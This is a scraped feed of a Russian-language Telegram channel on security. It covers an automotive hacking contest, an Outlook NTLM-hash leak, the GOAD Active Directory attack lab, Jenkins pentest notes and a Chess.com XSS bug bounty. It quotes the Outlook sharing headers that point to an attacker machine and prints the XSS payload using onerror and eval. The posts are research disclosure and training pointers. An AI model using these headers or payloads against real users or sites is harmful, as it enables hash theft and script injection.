📌 На соревнованиях были продемонстрированы 49 0-day в автомобильных информационно-развлекательных платформах, ОС и устройствах зарядки электромобилей. Немного деталей об атаках, которые показали исследователи:
• Два взлома окружения на базе дистрибутива Automotive Grade Linux ($47500, $35000)
• Взлом информационно-развлекательной системы автомобиля Tesla
• Взлом модема, используемого в автомобиле Tesla
• Пять взломов информационно-развлекательной системы на базе платформы Sony XAV-AX5500
• Взлом информационно-развлекательной системы на базе платформы Pioneer DMH-WT7600NEX
• Шесть взломов информационно-развлекательной системы на базе платформы Alpine Halo9 iLX-F509
• Два взлома зарядной станции Ubiquiti Connect EV Station
• Три взлома зарядной станции Phoenix Contact CHARX SEC-3100
• Взлом зарядной станции EMPORIA EV Charger Level 2
• Четыре взлома зарядной станции JuiceBox 40 Smart EV
• Семь взломов домашней зарядной станции ChargePoint Home Flex, позволивших выполнить код на уровне прошивки устройства
• Три взлома зарядной станции Autel MaxiCharger AC Wallbox Commercial
#hackevent
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.
К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.
Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.
📌 Те самые заголовки Outlook:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
📦 Невероятно крутые и доступные в понимании (особенно если смотреть после прочтения райтапа) видеоразборы заданий с HackTheBox от архитектора лабораторий.
Вот, например, разбор SSTI в приложении на Flask, взлом PyJWT и реверс/брутфорс TOPT Browser Plugin Export.
📺 Смотреть плейлист
#ctf #pentest #practice
Вот, например, разбор SSTI в приложении на Flask, взлом PyJWT и реверс/брутфорс TOPT Browser Plugin Export.
#ctf #pentest #practice
Please open Telegram to view this post
VIEW IN TELEGRAM
🛠 btop — инструмент для мониторинга ресурсов системы, который выводит статистку использования процессора, памяти, сети и дисков. Это альтернатива привычного вам инструмента с более приятным UI, поддержкой мыши, простой сортировкой/фильтрацией, кастомными настройками, возможностью отображения индикатора батареи и т. д.
👉 GutHub
#tools #linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
📙 Книга тайных знаний — тщательно подобранная коллекция ресурсов, руководств, шпаргалок, блогов, советов, однострочников, CLI-инструментов и многого другого для системных и сетевых администраторов, DevOps-специалистов, пентестеров и исследователей безопасности.
👉 GitHub
#cheatsheet
👉 GitHub
#cheatsheet
Всеволод Кокорин, исследователь безопасности в SolidLab, делится историей нахождения уязвимости и описывает технические аспекты, которые привели к её возникновению. Сама уязвимость существовала в течение длительного времени и была устранена в октябре 2023 года.
📌 Вы узнаете про Service Worker + PWA, про аспекты, связанные с Payment Request API и спецификацией JIT-installed воркеров, а также про то, как архитектурные решения в веб-приложениях могут привести к серьезным багам.
👉 Читать
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🧰GOAD — одна из самых актуальных и самодостаточных тестовых лаб для пентеста окружения на базе Active Directory.
Главная цель — предоставить пентестерам уязвимую среду Active Directory, готовую к использованию для отработки основных атак, включая:
• Password reuse between computer (PTH)
• Spray User = Password
• Password in description
• SMB share anonymous
• SMB not signed
• Responder
• Zerologon
• Windows defender
• ASREPRoast
• Kerberoasting
• AD Acl abuse
• Unconstraint delegation
• Ntlm relay
• Constrained delegation
• Install MSSQL
• MSSQL trusted link
• MSSQL impersonate
• Install IIS
• Upload asp app
• Multiples forest
• Anonymous RPC user listing
• Child parent domain
• Generate certificate and enable ldaps
• ADCS - ESC 1/2/3/4/6/8
• Certifry
• Samaccountname/nopac
• Petitpotam unauthent
• Printerbug
• Drop the mic
• Shadow credentials
• Mitm6
• Add LAPS
• GPO abuse
• Add Webdav
• Add RDP bot
• Add full proxmox integration
• Add Gmsa и многие другие
#practice #pentest
Главная цель — предоставить пентестерам уязвимую среду Active Directory, готовую к использованию для отработки основных атак, включая:
• Password reuse between computer (PTH)
• Spray User = Password
• Password in description
• SMB share anonymous
• SMB not signed
• Responder
• Zerologon
• Windows defender
• ASREPRoast
• Kerberoasting
• AD Acl abuse
• Unconstraint delegation
• Ntlm relay
• Constrained delegation
• Install MSSQL
• MSSQL trusted link
• MSSQL impersonate
• Install IIS
• Upload asp app
• Multiples forest
• Anonymous RPC user listing
• Child parent domain
• Generate certificate and enable ldaps
• ADCS - ESC 1/2/3/4/6/8
• Certifry
• Samaccountname/nopac
• Petitpotam unauthent
• Printerbug
• Drop the mic
• Shadow credentials
• Mitm6
• Add LAPS
• GPO abuse
• Add Webdav
• Add RDP bot
• Add full proxmox integration
• Add Gmsa и многие другие
#practice #pentest
Внутри каждого из нас живет критик. А как вы справляетесь со своим?
Anonymous Poll
20%
Хвалю себя за маленькие шаги
43%
Трезво оцениваю ситуацию
17%
Заменяю негативные мысли позитивными
16%
Критикую его в ответ
30%
Не справляюсь
4%
Свой вариант (напишу в комментарии)
This media is not supported in your browser
VIEW IN TELEGRAM
🤛 Windows 10 очень любит Интернет. Обновления, синхронизации, телеметрия и ещё куча разной другой очень нужной ей информации постоянно гуляет через наши сетевые соединения.
🤦 Одним словом, хорошего мало. Чтобы подобного не происходило, надо «заткнуть рот Windows», то есть сделать так, чтобы она самостоятельно перестала «стучаться» в Интернет, устанавливать обновления и заниматься прочими непотребствами.
😎 Читайте подробнее о том, какие именно сетевые возможности винды можно отключить, чтобы это прошло без последствий.
#security
🤦 Одним словом, хорошего мало. Чтобы подобного не происходило, надо «заткнуть рот Windows», то есть сделать так, чтобы она самостоятельно перестала «стучаться» в Интернет, устанавливать обновления и заниматься прочими непотребствами.
😎 Читайте подробнее о том, какие именно сетевые возможности винды можно отключить, чтобы это прошло без последствий.
#security
🧑💻 Статьи для IT: как объяснять и распространять значимые идеи
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
🧰 Jenkins можно часто встретить в инфраструктуре в ходе пентеста. Это популярный инструмент автоматизации, широко используемый в процессах CI/CD.
📌 Если встретите, просто откройте эти заметки, — в них перечислены основные CVE/poc’и и полезные скрипты/советы для пентеста:
☑️ Password spraying
☑️ Дамп сборок для поиска секретов в открытом виде
☑️ Файлы, на которые обратить внимание после компрометации
☑️ Дешифрование секретов Jenkins онлайн и многое другое
#pentest #tools
📌 Если встретите, просто откройте эти заметки, — в них перечислены основные CVE/poc’и и полезные скрипты/советы для пентеста:
☑️ Password spraying
☑️ Дамп сборок для поиска секретов в открытом виде
☑️ Файлы, на которые обратить внимание после компрометации
☑️ Дешифрование секретов Jenkins онлайн и многое другое
#pentest #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
♟От ладьи до XSS: история простого, но не самого очевидного бага на топовом шахматном сайте Chess.com
Многие говорят, что ломать те сервисы, которыми пользуешься каждый день, намного круче. Так и получилось у исследователя, который возился с настройками профиля и наткнулся на редактор
📌 Читайте подробнее, как ему удалось дойти до такого пэйлоада:
#bugbounty #pentest
Многие говорят, что ломать те сервисы, которыми пользуешься каждый день, намного круче. Так и получилось у исследователя, который возился с настройками профиля и наткнулся на редактор
TinyMCE
с возможностью загрузки изображений. 📌 Читайте подробнее, как ему удалось дойти до такого пэйлоада:
<p><img src="a.png" style="display: block; margin: 0 auto;" srcset=url(https://images.chesscomfiles.com/onerror=eval(atob("YWxlcnQoMSk=)));2+4//></p>
#bugbounty #pentest
Skii.dev
Rook to XSS: How I hacked chess.com with a rookie exploit
Playing Chess is one of the many hobbies I like to do in my spare time, apart from tinkering around with technology. However, I'm not very good at it, and after losing many games, I decided to see if I could do something I'm much better at; hacking the system!
Как вы обычно отдыхаете?
Anonymous Poll
34%
У самурая нет отдыха, только хардкор
10%
Делаю что-то своими руками
38%
Лежу, туплю и расслабляюсь
3%
Хожу на массаж
18%
Занимаюсь йогой/спортом
21%
Гуляю на свежем воздухе
7%
Хожу в походы (активный отдых)
39%
Читаю книги/играю в игры/смотрю кино или сериалы
12%
Пилю пет-проект
5%
Свой вариант (напишу в комментариях)
🤯 Про нашумевший тред парня, который нашел жену из 5239 девушек с помощью ChatGPT, слышно из каждого утюга. Поэтому интересна уже не сама история, а то, как люди на нее реагируют. А люди обычно разбираются, правда это или хайп, а также делают мемы.
🤦 Так вот, здесь айтишник с технической точки зрения оценил этот самый тред. Спойлер: либо парень гений, либо врёт.
Ну а мемы прикрепили к посту 😉
#назлобудня
🤦 Так вот, здесь айтишник с технической точки зрения оценил этот самый тред. Спойлер: либо парень гений, либо врёт.
Ну а мемы прикрепили к посту 😉
#назлобудня